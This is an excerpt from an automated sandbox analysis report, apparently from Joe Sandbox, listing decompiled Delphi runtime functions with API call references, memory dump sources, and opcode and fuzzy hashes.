                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                  • Opcode ID: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                  • Instruction ID: 68bf6f208d1ebe513e8a8dda1fcfe738442d494e70350c7787d103a1d8736fcd
                                                                                                  • Opcode Fuzzy Hash: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                  • Instruction Fuzzy Hash: 37413B6558B6C74A23146BADF90343777D89AA4E94360833BF808CA282DFB87C408769
                                                                                                  Function 50024D00 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 255timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500246E0: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                    • Part of subcall function 500246E0: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                  • @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50025040), ref: 50024D8B
                                                                                                    • Part of subcall function 5001A684: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A736), ref: 5001A6C0
                                                                                                    • Part of subcall function 5001A684: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6DF
                                                                                                    • Part of subcall function 5001A684: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6F5
                                                                                                    • Part of subcall function 5002483C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002485E
                                                                                                    • Part of subcall function 5002483C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 50024866
                                                                                                    • Part of subcall function 5002483C: @Sysutils@AnsiStrPos$qqrpbt1.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002486C
                                                                                                  • @Sysutils@CurrentYear$qqrv.RTL120(?,?,?,00000000,50025040), ref: 50024EAC
                                                                                                    • Part of subcall function 50022830: GetLocalTime.KERNEL32 ref: 50022834
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50025040), ref: 50024D80
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,50025040), ref: 50024DA5
                                                                                                  • @System@Pos$qqrx20System@UnicodeStringt1.RTL120(?,?,00000000,50025040), ref: 50024F43
                                                                                                  • @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120(?,?,?,00000000,50025040), ref: 50025010
                                                                                                    • Part of subcall function 50024778: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F4
                                                                                                    • Part of subcall function 50024778: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$Sysutils@$Ansi$EnsureFromString$qqrr20$Char$qqrx20InternalLen$qqrx20Pos$qqrx20Str$qqrr20Stringt1Stringx27System@%T$us$i0$%Time$Asg$qqrr20CharCopy$qqrx20CurrentDateDate$qqrusususr16EncodeLen$qqrr20LocalPos$qqrpbt1StringiiStringpbiStringx20Trim$qqrx20Year$qqrv
                                                                                                  • String ID: ddd
                                                                                                  • API String ID: 1381184704-4224823564
                                                                                                  • Opcode ID: e386033784eb847864489c39f08a3879fa3b97122ed4c4e9c4fae4110e8f86f9
                                                                                                  • Instruction ID: 7e45ed9e95105cac947c5d20d2be00b22e649cf3ab46312cbd668170dbcc43f1
                                                                                                  • Opcode Fuzzy Hash: e386033784eb847864489c39f08a3879fa3b97122ed4c4e9c4fae4110e8f86f9
                                                                                                  • Instruction Fuzzy Hash: 75A1BE70A0229A8BDF40DFE5E8806FEB7F1BF19300F50426AE844E7251D7349E45CBA6
                                                                                                  Function 5001CA14 Relevance: 34.6, APIs: 23, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001CA61
                                                                                                    • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                  • @Sysutils@ExpandFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA78
                                                                                                    • Part of subcall function 5001C9D8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000104,?), ref: 5001C9F1
                                                                                                    • Part of subcall function 5001C9D8: GetFullPathNameW.KERNEL32(00000000,00000104,?), ref: 5001C9F7
                                                                                                    • Part of subcall function 5001C9D8: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000104,?), ref: 5001CA04
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA82
                                                                                                    • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                    • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA8C
                                                                                                    • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                    • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAA3
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                    • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                  • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAB4
                                                                                                    • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                    • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                    • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                  • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001CC45), ref: 5001CAC2
                                                                                                    • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                    • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                    • Part of subcall function 5002889C: @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                  • @Sysutils@ExcludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAFC
                                                                                                    • Part of subcall function 50028704: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5002870F
                                                                                                    • Part of subcall function 50028704: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028729
                                                                                                    • Part of subcall function 50028704: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028748
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB0A
                                                                                                  • @Sysutils@ExpandFileNameCase$qqrx20System@UnicodeStringr27Sysutils@TFilenameCaseMatch.RTL120(00000000,5001CC45), ref: 5001CB1E
                                                                                                    • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB2C
                                                                                                    • Part of subcall function 5001CA14: @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB49
                                                                                                    • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB57
                                                                                                  • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CAEA
                                                                                                    • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                  • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CADD
                                                                                                    • Part of subcall function 5001C0CC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                    • Part of subcall function 5001C0CC: FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                    • Part of subcall function 5001C0CC: @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB76
                                                                                                  • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB8C
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBB8
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBBD
                                                                                                  • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(5001CBE4,00000000,5001CC45), ref: 5001CBD7
                                                                                                  • @System@@FinalizeRecord$qqrpvt1.RTL120(5001CC4C), ref: 5001CC32
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Sysutils@$System@@$String$Stringx20$Delimiter$qqrx20FileFind$Path$Asg$qqrr20Search$AnsiStringt1$Case$qqrx20Close$qqrr19Copy$qqrx20ExtractFromName$qqrx20StringiStringiiTrailing$Cat3$qqrr20Char$qqrx20ExpandFirst$qqrx20IncludeInitializeInternalLastLowerNameRecord$qqrpvt1Str$qqrr20Stringir19Stringt2Stringx27System@%T$us$i0$%$Array$qqrpvt1uiCaseCat$qqrr20CharCloseCompareDrive$qqrx20ExcludeExit$qqrvFilenameFinalizeFinallyFirstFullLen$qqrr20Length$qqrr20MatchPath$qqrx20SameStr$qqrx20StringpbiStringr27
                                                                                                  • String ID:
                                                                                                  • API String ID: 3647251182-0
                                                                                                  • Opcode ID: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                  • Instruction ID: 8f116e2beaebb0910c79983e48f6089e9e1a1bde4e140d13074eedb8cff09ffc
                                                                                                  • Opcode Fuzzy Hash: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                  • Instruction Fuzzy Hash: B9510734906199DBDB50DFA4DD96ACDB7B5EF49310F9082E6E808A3211DB30AF85CF80
                                                                                                  Function 50003454 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 277windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003480
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003492
                                                                                                  • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 500034FA
                                                                                                  • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 5000354C
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 500035B3
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003637
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003694
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 500036CD
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 500036E9
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003705
                                                                                                    • Part of subcall function 50003018: @System@Move$qqrpxvpvi.RTL120(?,?,500035CA), ref: 50003022
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 5000379C
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003802
                                                                                                  • MessageBoxA.USER32(00000000,?,50001ED0,00002010), ref: 50003829
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$CharLen$qqrpc$System@$Char$qqrpvibExpectedFillLeak$qqrpvMemoryUnregister$MessageMove$qqrpxvpvi
                                                                                                  • String ID: $7$<JP$jP
                                                                                                  • API String ID: 1068419464-4104698994
                                                                                                  • Opcode ID: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                  • Instruction ID: 1bd8d098dfdd9012cd56aed44c4f0c03c4dd7fa1f26bc2d498341ce450a84f99
                                                                                                  • Opcode Fuzzy Hash: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                  • Instruction Fuzzy Hash: 27B1E430A052D48BFB32DB6CDC90B88B7F8BB49650F9442E6E449DB352CB719D85CB91
                                                                                                  Function 500391B0 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Stringx20System@@$Asg$qqrr20Cat3$qqrr20StringStringt2
                                                                                                  • String ID: Any$Array $ByRef $String$UnicodeString
                                                                                                  • API String ID: 2201327990-2617011621
                                                                                                  • Opcode ID: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                  • Instruction ID: ebc111c00f9f3ce4b2f0d66ad6076afb76b8f2783d8abbf171bc1124b3b59010
                                                                                                  • Opcode Fuzzy Hash: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                  • Instruction Fuzzy Hash: 4E21F7347055D0AFEF12EAD8D851BDAB3DAEF9A710FA04713BA0097386C6789E01C691
                                                                                                  Function 50002B10 Relevance: 28.9, APIs: 19, Instructions: 407COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@SysGetMem$qqri.RTL120 ref: 50002B40
                                                                                                  • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B58
                                                                                                  • @System@SysGetMem$qqri.RTL120 ref: 50002B76
                                                                                                  • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$FreeMem$qqriMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 1065326172-0
                                                                                                  • Opcode ID: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                  • Instruction ID: 109219bf6a90ecac94eeb607d3392a2891908dbfbfbb0241e4c678e92fbbb21d
                                                                                                  • Opcode Fuzzy Hash: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                  • Instruction Fuzzy Hash: 48C10762700A814BF7159ABC9CA57ADB3D19BD4221F98833EE614CB396DAB4EC458381
                                                                                                  Function 5001D12C Relevance: 28.6, APIs: 19, Instructions: 137COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D15E
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D16C
                                                                                                  • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D175
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D18F
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1A2
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1EA
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1F8
                                                                                                  • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D201
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D20E
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(5001D2FC,5001D2E8,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D22C
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D250
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(5001D2FC,?,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D264
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D275
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D27F
                                                                                                    • Part of subcall function 5001D100: @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000004,?,5001D1B5,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D110
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D28A
                                                                                                    • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                    • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D294
                                                                                                    • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
